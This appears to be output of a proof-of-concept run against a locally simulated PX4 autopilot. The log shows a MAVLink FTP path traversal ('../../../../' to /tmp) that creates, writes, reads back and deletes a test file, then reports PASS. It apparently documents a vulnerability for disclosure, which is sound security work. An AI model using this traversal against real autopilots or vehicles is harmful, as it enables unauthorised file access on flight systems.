[*] target=127.0.0.1:18570 bind=0.0.0.0:14550
[*] work_dir=/home/yxhueimie/PX4/PX4-Autopilot/build/px4_sitl_default/rootfs
[*] traversal_path=../../../../../../../tmp/px4_mavftp_disclosure_poc.txt
[*] FTP OP_CREATE ...
[+] CREATE ack (session=0)
[*] FTP OP_WRITE ...
[+] WRITE ack
[*] FTP OP_TERMINATE (close write session) ...
[+] TERMINATE ack
[*] FTP OP_OPEN_RO ...
[+] OPEN_RO ack (session=0)
[*] FTP OP_READ ...
[+] READ ack
read_bytes= b'PX4_MAVFTP_DISCLOSURE_POC\n'
[*] FTP OP_TERMINATE (close RO session) ...
[+] TERMINATE ack
[*] FTP OP_REMOVE_FILE ...
[+] REMOVE_FILE ack
PASS: traversal CREATE/WRITE/READ succeeded and content matched
